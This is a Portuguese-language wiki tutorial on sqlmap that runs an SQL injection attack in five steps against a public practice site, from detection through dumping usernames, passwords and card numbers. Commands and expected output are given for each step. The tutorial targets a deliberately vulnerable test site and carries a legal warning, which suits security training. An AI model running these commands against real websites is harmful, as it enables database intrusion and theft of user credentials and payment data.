SQLMAP - LittlePlantXD/CyberGamer GitHub Wiki

Guia Simplificado do Sqlmap: Comandos e Argumentos Explicados

Lembrete Rápido:

  • SQL Injection: Falha que permite "injetar" comandos no banco de dados de um site.
  • Sqlmap: Ferramenta para automatizar a descoberta e exploração dessas falhas.
  • Alvo de Teste Seguro: http://testphp.vulnweb.com/listproducts.php?cat=1
  • ⚠️ Aviso Legal: Use Sqlmap apenas com permissão. É ilegal atacar alvos sem consentimento.

Passo 1: Testar se a URL é vulnerável a SQL Injection

Objetivo: Descobrir se o site tem uma brecha de SQL Injection na URL fornecida.

Comando:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1"

Argumentos Usados:

  • -u "http://testphp.vulnweb.com/listproducts.php?cat=1": Especifica a URL alvo que o Sqlmap vai testar.

Como Interpretar o Resultado Principal:

  • Sqlmap pode fazer perguntas interativas.
  • Procure pela mensagem: GET parameter 'cat' is vulnerable.
  • Serão mostrados tipo de SGBD, versão do PHP e outros dados relevantes.

Passo 2: Listar os Bancos de Dados (Databases) do Servidor

Objetivo: Ver quais bancos de dados existem no servidor.

Comando:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

Argumentos Usados:

  • --dbs: Lista todos os bancos de dados acessíveis.

Resultado Esperado:

available databases [2]:
[*] acuart
[*] information_schema

Passo 3: Listar as Tabelas dentro do Banco de Dados acuart

Objetivo: Descobrir as tabelas existentes em um banco de dados.

Comando:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables

Argumentos Usados:

  • -D acuart: Define o banco de dados alvo.
  • --tables: Lista as tabelas desse banco.

Resultado Esperado:

Database: acuart
[8 tables]
+-----------+
| artists   |
| ...       |
| users     |
+-----------+

Passo 4: Listar as Colunas da Tabela users

Objetivo: Descobrir quais colunas existem na tabela.

Comando:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns

Argumentos Usados:

  • -T users: Especifica a tabela.
  • --columns: Lista as colunas.

Resultado Esperado:

Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| name    | varchar(100) |
| cc      | varchar(100) |
| pass    | varchar(100) |
| uname   | varchar(100) |
| ...     | ...          |
+---------+--------------+

Passo 5: Extrair (Dump) os Dados da Tabela users

Objetivo: Ver o conteúdo real da tabela.

Comando:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C "uname,pass,email,name,cc" --dump

Argumentos Usados:

  • -C "colunas": Define quais colunas extrair.
  • --dump: Faz o dump dos dados.

Resultado Esperado:

  • Dados reais extraídos e exibidos no terminal.